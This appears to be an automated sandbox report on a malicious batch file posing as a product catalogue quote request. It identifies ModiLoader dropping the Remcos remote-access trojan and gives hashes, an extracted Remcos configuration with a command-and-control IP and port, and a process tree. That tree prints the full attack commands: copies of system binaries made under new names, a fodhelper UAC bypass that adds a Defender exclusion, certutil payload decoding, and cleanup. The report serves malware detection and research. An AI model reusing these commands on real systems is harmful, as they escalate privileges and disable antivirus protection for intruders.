modiloader | c91aecc289ef01ff1262a274a65124f7a0d0cdf26308de625ce64231c7aa77d1

General

Target

PODUCT CATALOGUE REQUEST FOR QOUTATIONSTORE.bat
Size

4.4MB
MD5

a9f2c8cc828e683395e9a804c120021e
SHA1

6b1f7e910df1792b94690045d3de345cff297ff3
SHA256

c91aecc289ef01ff1262a274a65124f7a0d0cdf26308de625ce64231c7aa77d1
SHA512

c0e6d23b0ba6bc4255938d8b14b563100068e25ab2d9c5e5e9632683c6b1bd28f8fc32b4f2b790400b66977b24f0ff574b2025a7fdee7e968c08d975ff1c227d
SSDEEP

49152:xOp5wZlcwP4QJpMoD8cGL2tojFdpjyPHKbfS4b0umx0TwKi3K6lflLE/B2t3mTss:0

Score

10^/10

modiloader remcos remotehost rat trojan

Malware Config

Extracted

Family

remcos

Botnet

RemoteHost

C2

192.3.216.139:44800

Attributes

audio_folder
MicRecords
audio_record_time
5
connect_delay
0
connect_interval
1
copy_file
remcos.exe
copy_folder
Remcos
delete_file
false
hide_file
false
hide_keylog_file
false
install_flag
false
keylog_crypt
false
keylog_file
logs.dat
keylog_flag
false
keylog_folder
remcos
mouse_option
false
mutex
Rmc-EP05ZF
screenshot_crypt
false
screenshot_flag
false
screenshot_folder
Screenshots
screenshot_path
%AppData%
screenshot_time
10
take_screenshot_option
false
take_screenshot_time
5

Signatures

ModiLoader, DBatLoader
ModiLoader is a Delphi loader that misuses cloud services to download other malicious families.
trojan modiloader
Remcos
Remcos is a closed-source remote control and surveillance software.
rat remcos

ModiLoader Second Stage 1 IoCs

Processes:

resource	yara_rule
behavioral2/memory/5096-56-0x00000000040C0000-0x00000000050C0000-memory.dmp	modiloader_stage2

Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.

Query Registry
T1012

System Information Discovery
T1082

Processes:

xkn.exe

description ioc process

Key value queried \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000\Control Panel\International\Geo\Nation xkn.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000\Control Panel\International\Geo\Nation	xkn.exe

Executes dropped EXE 16 IoCs

Processes:

alpha.exealpha.exealpha.exexkn.exealpha.exealpha.exekn.exealpha.exekn.exeLewxa.comalpha.exealpha.exealpha.exealpha.exealpha.exealpha.exe

pid	process
3336	alpha.exe
4176	alpha.exe
408	alpha.exe
4900	xkn.exe
4968	alpha.exe
4032	alpha.exe
4392	kn.exe
3800	alpha.exe
5084	kn.exe
5096	Lewxa.com
5052	alpha.exe
3332	alpha.exe
4320	alpha.exe
4628	alpha.exe
3296	alpha.exe
4276	alpha.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Kills process with taskkill 2 IoCs
evasion

Processes:

taskkill.exetaskkill.exe

pid process

1688 taskkill.exe
384 taskkill.exe

pid	process
1688	taskkill.exe
384	taskkill.exe

Modifies registry class 5 IoCs

Processes:

reg.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\ms-settings\shell	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\ms-settings\shell\open	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\ms-settings\shell\open\command\ = "C:\\\\Users\\\\Public\\\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:\\Users "	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\ms-settings\shell\open\command	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\ms-settings	reg.exe

Modifies registry key 1 TTPs 1 IoCs

Modify Registry
T1112

Processes:

reg.exe

pid process

5028 reg.exe
Script User-Agent 1 IoCs
Uses user-agent string associated with script host/environment.

Processes:

description flow ioc

HTTP User-Agent header 25 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Suspicious behavior: EnumeratesProcesses 2 IoCs

Processes:

xkn.exe

pid process

4900 xkn.exe
4900 xkn.exe
Suspicious use of AdjustPrivilegeToken 3 IoCs

Processes:

xkn.exetaskkill.exetaskkill.exe

description pid process

Token: SeDebugPrivilege 4900 xkn.exe
Token: SeDebugPrivilege 1688 taskkill.exe
Token: SeDebugPrivilege 384 taskkill.exe
Suspicious use of FindShellTrayWindow 1 IoCs

Processes:

Lewxa.com

pid process

5096 Lewxa.com
Suspicious use of SendNotifyMessage 1 IoCs

Processes:

Lewxa.com

pid process

5096 Lewxa.com

pid	process
5028	reg.exe

description	flow	ioc
HTTP User-Agent header	25	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

pid	process
4900	xkn.exe
4900	xkn.exe

description	pid	process
Token: SeDebugPrivilege	4900	xkn.exe
Token: SeDebugPrivilege	1688	taskkill.exe
Token: SeDebugPrivilege	384	taskkill.exe

pid	process
5096	Lewxa.com

pid	process
5096	Lewxa.com

Suspicious use of WriteProcessMemory 49 IoCs

Processes:

cmd.execmd.exealpha.exealpha.exealpha.exexkn.exealpha.exealpha.exealpha.exealpha.exealpha.exe

description	pid	process	target process
PID 3728 wrote to memory of 2836	3728	cmd.exe	cmd.exe
PID 3728 wrote to memory of 2836	3728	cmd.exe	cmd.exe
PID 2836 wrote to memory of 4528	2836	cmd.exe	extrac32.exe
PID 2836 wrote to memory of 4528	2836	cmd.exe	extrac32.exe
PID 3728 wrote to memory of 3336	3728	cmd.exe	alpha.exe
PID 3728 wrote to memory of 3336	3728	cmd.exe	alpha.exe
PID 3336 wrote to memory of 2908	3336	alpha.exe	extrac32.exe
PID 3336 wrote to memory of 2908	3336	alpha.exe	extrac32.exe
PID 3728 wrote to memory of 4176	3728	cmd.exe	alpha.exe
PID 3728 wrote to memory of 4176	3728	cmd.exe	alpha.exe
PID 4176 wrote to memory of 4824	4176	alpha.exe	extrac32.exe
PID 4176 wrote to memory of 4824	4176	alpha.exe	extrac32.exe
PID 3728 wrote to memory of 408	3728	cmd.exe	alpha.exe
PID 3728 wrote to memory of 408	3728	cmd.exe	alpha.exe
PID 408 wrote to memory of 4900	408	alpha.exe	xkn.exe
PID 408 wrote to memory of 4900	408	alpha.exe	xkn.exe
PID 4900 wrote to memory of 4968	4900	xkn.exe	alpha.exe
PID 4900 wrote to memory of 4968	4900	xkn.exe	alpha.exe
PID 4968 wrote to memory of 5028	4968	alpha.exe	reg.exe
PID 4968 wrote to memory of 5028	4968	alpha.exe	reg.exe
PID 4900 wrote to memory of 2656	4900	xkn.exe	fodhelper.exe
PID 4900 wrote to memory of 2656	4900	xkn.exe	fodhelper.exe
PID 3728 wrote to memory of 4032	3728	cmd.exe	alpha.exe
PID 3728 wrote to memory of 4032	3728	cmd.exe	alpha.exe
PID 4032 wrote to memory of 4392	4032	alpha.exe	kn.exe
PID 4032 wrote to memory of 4392	4032	alpha.exe	kn.exe
PID 3728 wrote to memory of 3800	3728	cmd.exe	alpha.exe
PID 3728 wrote to memory of 3800	3728	cmd.exe	alpha.exe
PID 3800 wrote to memory of 5084	3800	alpha.exe	kn.exe
PID 3800 wrote to memory of 5084	3800	alpha.exe	kn.exe
PID 3728 wrote to memory of 5096	3728	cmd.exe	Lewxa.com
PID 3728 wrote to memory of 5096	3728	cmd.exe	Lewxa.com
PID 3728 wrote to memory of 5096	3728	cmd.exe	Lewxa.com
PID 3728 wrote to memory of 5052	3728	cmd.exe	alpha.exe
PID 3728 wrote to memory of 5052	3728	cmd.exe	alpha.exe
PID 3728 wrote to memory of 3332	3728	cmd.exe	alpha.exe
PID 3728 wrote to memory of 3332	3728	cmd.exe	alpha.exe
PID 3728 wrote to memory of 4320	3728	cmd.exe	alpha.exe
PID 3728 wrote to memory of 4320	3728	cmd.exe	alpha.exe
PID 3728 wrote to memory of 4628	3728	cmd.exe	alpha.exe
PID 3728 wrote to memory of 4628	3728	cmd.exe	alpha.exe
PID 3728 wrote to memory of 3296	3728	cmd.exe	alpha.exe
PID 3728 wrote to memory of 3296	3728	cmd.exe	alpha.exe
PID 3296 wrote to memory of 1688	3296	alpha.exe	taskkill.exe
PID 3296 wrote to memory of 1688	3296	alpha.exe	taskkill.exe
PID 3728 wrote to memory of 4276	3728	cmd.exe	alpha.exe
PID 3728 wrote to memory of 4276	3728	cmd.exe	alpha.exe
PID 4276 wrote to memory of 384	4276	alpha.exe	taskkill.exe
PID 4276 wrote to memory of 384	4276	alpha.exe	taskkill.exe

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\PODUCT CATALOGUE REQUEST FOR QOUTATIONSTORE.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:3728

C:\Windows\system32\cmd.exe
cmd /c extrac32.exe /C /Y C:\\Windows\\System32\\cmd.exe C:\\Users\\Public\\alpha.exe
2⤵
- Suspicious use of WriteProcessMemory
PID:2836

C:\Windows\system32\extrac32.exe
extrac32.exe /C /Y C:\\Windows\\System32\\cmd.exe C:\\Users\\Public\\alpha.exe
3⤵
PID:4528

C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c extrac32.exe /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe C:\\Users\\Public\\xkn.exe
2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3336

C:\Windows\system32\extrac32.exe
extrac32.exe /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe C:\\Users\\Public\\xkn.exe
3⤵
PID:2908

C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c extrac32.exe /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4176

C:\Windows\system32\extrac32.exe
extrac32.exe /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
3⤵
PID:4824

C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c reg add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\Users "' ; start fodhelper.exe "
2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:408

C:\Users\Public\xkn.exe
C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c reg add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\Users "' ; start fodhelper.exe "
3⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4900

C:\Users\Public\alpha.exe
"C:\Users\Public\alpha.exe" /c reg add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:\Users "
4⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4968

C:\Windows\system32\reg.exe
reg add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:\Users "
5⤵
- Modifies registry class
- Modifies registry key
PID:5028

C:\Windows\system32\fodhelper.exe
"C:\Windows\system32\fodhelper.exe"
4⤵
PID:2656

C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\Users\Admin\AppData\Local\Temp\PODUCT CATALOGUE REQUEST FOR QOUTATIONSTORE.bat" "C:\\Users\\Public\\Lewxa.txt" 9
2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4032

C:\Users\Public\kn.exe
C:\\Users\\Public\\kn -decodehex -F "C:\Users\Admin\AppData\Local\Temp\PODUCT CATALOGUE REQUEST FOR QOUTATIONSTORE.bat" "C:\\Users\\Public\\Lewxa.txt" 9
3⤵
- Executes dropped EXE
PID:4392

C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\Lewxa.txt" "C:\\Users\\Public\\Libraries\\Lewxa.com" 12
2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3800

C:\Users\Public\kn.exe
C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\Lewxa.txt" "C:\\Users\\Public\\Libraries\\Lewxa.com" 12
3⤵
- Executes dropped EXE
PID:5084

C:\Users\Public\Libraries\Lewxa.com
C:\\Users\\Public\\Libraries\\Lewxa.com
2⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:5096

C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c del "C:\Users\Public\Lewxa" / A / F / Q / S
2⤵
- Executes dropped EXE
PID:5052

C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c del "C:\Users\Public\Lewxa.txt" / A / F / Q / S
2⤵
- Executes dropped EXE
PID:3332

C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c del "C:\Users\Public\xkn.exe" / A / F / Q / S
2⤵
- Executes dropped EXE
PID:4320

C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c del "C:\Users\Public\kn.exe" / A / F / Q / S
2⤵
- Executes dropped EXE
PID:4628

C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c taskkill /F /IM SystemSettings.exe
2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3296

C:\Windows\system32\taskkill.exe
taskkill /F /IM SystemSettings.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1688

C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c taskkill /F /IM SystemSettingsAdminFlows.exe
2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4276

C:\Windows\system32\taskkill.exe
taskkill /F /IM SystemSettingsAdminFlows.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:384

C:\Windows\system32\SystemSettingsAdminFlows.exe
"C:\Windows\system32\SystemSettingsAdminFlows.exe" OptionalFeaturesAdminHelper
1⤵
PID:3556

Network

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

1

T1112

Credential Access

Discovery

Query Registry

1

T1012

System Information Discovery

2

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Resource Development

Reconnaissance

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_pydormqv.52z.ps1
Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Public\Lewxa.txt
Filesize
3.1MB

MD5
aecbd8ff910c38b1772994a46cf4dcee

SHA1
96e1b7e276e7b19150c259a344e45b9fa04fac43

SHA256
f29aff3e41afb8bdc6aeffbb4dc0f0083a7851a4fae1ef39a44bf72d7ede6c33

SHA512
2919015e969612462b2d5b91e1bfa4ec92277f065628e3b5fc6126974203bd490ab89809f14951ac0a5e9d888dbde98af1ebb3900318fa6d718fd04e89d36d18

Download Submit
C:\Users\Public\Libraries\Lewxa.com
Filesize
1.5MB

MD5
6babecb95e226aef5eef6f80111e04de

SHA1
f2974245b3391f9be136fdf76df36cc5ad0bed2d

SHA256
a561b2ad4fea4284042c99132d49d651f3d409cc41dc6e950dc85a16ae3934a0

SHA512
109d9814b12c61c9579395317dc54a6a0092b3ec1b54d4eab9c3489ffe11971e977f8676f44886e46299bbbf49407e33e02642a0ec151144a3dc72b1a13e0949

Download Submit
C:\Users\Public\alpha.exe
Filesize
283KB

MD5
8a2122e8162dbef04694b9c3e0b6cdee

SHA1
f1efb0fddc156e4c61c5f78a54700e4e7984d55d

SHA256
b99d61d874728edc0918ca0eb10eab93d381e7367e377406e65963366c874450

SHA512
99e784141193275d4364ba1b8762b07cc150ca3cb7e9aa1d4386ba1fa87e073d0500e61572f8d1b071f2faa2a51bb123e12d9d07054b59a1a2fd768ad9f24397

Download Submit
C:\Users\Public\kn.exe
Filesize
1.6MB

MD5
bd8d9943a9b1def98eb83e0fa48796c2

SHA1
70e89852f023ab7cde0173eda1208dbb580f1e4f

SHA256
8de7b4eb1301d6cbe4ea2c8d13b83280453eb64e3b3c80756bbd1560d65ca4d2

SHA512
95630fdddad5db60cc97ec76ee1ca02dbb00ee3de7d6957ecda8968570e067ab2a9df1cc07a3ce61161a994acbe8417c83661320b54d04609818009a82552f7b

Download Submit
C:\Users\Public\xkn.exe
Filesize
442KB

MD5
04029e121a0cfa5991749937dd22a1d9

SHA1
f43d9bb316e30ae1a3494ac5b0624f6bea1bf054

SHA256
9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f

SHA512
6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b

Download Submit
memory/4900-17-0x0000026F6DD00000-0x0000026F6DD22000-memory.dmp

Filesize
136KB

Download
memory/4900-27-0x00007FFDCE690000-0x00007FFDCF151000-memory.dmp

Filesize
10.8MB

Download
memory/4900-29-0x0000026F6DD60000-0x0000026F6DD70000-memory.dmp

Filesize
64KB

Download
memory/4900-28-0x0000026F6DD60000-0x0000026F6DD70000-memory.dmp

Filesize
64KB

Download
memory/4900-32-0x0000026F6DD60000-0x0000026F6DD70000-memory.dmp

Filesize
64KB

Download
memory/4900-35-0x00007FFDCE690000-0x00007FFDCF151000-memory.dmp

Filesize
10.8MB

Download
memory/5096-56-0x00000000040C0000-0x00000000050C0000-memory.dmp

Filesize
16.0MB

Download
memory/5096-66-0x0000000016220000-0x0000000017220000-memory.dmp

Filesize
16.0MB

Download
memory/5096-48-0x0000000000A90000-0x0000000000A91000-memory.dmp

Filesize
4KB

Download
memory/5096-60-0x0000000000400000-0x0000000000596000-memory.dmp

Filesize
1.6MB

Download
memory/5096-61-0x0000000016220000-0x0000000017220000-memory.dmp

Filesize
16.0MB

Download
memory/5096-62-0x0000000016220000-0x0000000017220000-memory.dmp

Filesize
16.0MB

Download
memory/5096-63-0x0000000016220000-0x0000000017220000-memory.dmp

Filesize
16.0MB

Download
memory/5096-64-0x0000000016220000-0x0000000017220000-memory.dmp

Filesize
16.0MB

Download
memory/5096-65-0x0000000016220000-0x0000000017220000-memory.dmp

Filesize
16.0MB

Download
memory/5096-53-0x00000000040C0000-0x00000000050C0000-memory.dmp

Filesize
16.0MB

Download
memory/5096-69-0x0000000016220000-0x0000000017220000-memory.dmp

Filesize
16.0MB

Download
memory/5096-71-0x0000000016220000-0x0000000017220000-memory.dmp

Filesize
16.0MB

Download
memory/5096-74-0x0000000016220000-0x0000000017220000-memory.dmp

Filesize
16.0MB

Download
memory/5096-75-0x0000000016220000-0x0000000017220000-memory.dmp

Filesize
16.0MB

Download
memory/5096-80-0x0000000016220000-0x0000000017220000-memory.dmp

Filesize
16.0MB

Download
memory/5096-84-0x0000000016220000-0x0000000017220000-memory.dmp

Filesize
16.0MB

Download
memory/5096-90-0x0000000016220000-0x0000000017220000-memory.dmp

Filesize
16.0MB

Download
memory/5096-91-0x0000000016220000-0x0000000017220000-memory.dmp

Filesize
16.0MB

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v13

Replay Monitor

Loading Replay Monitor...

Downloads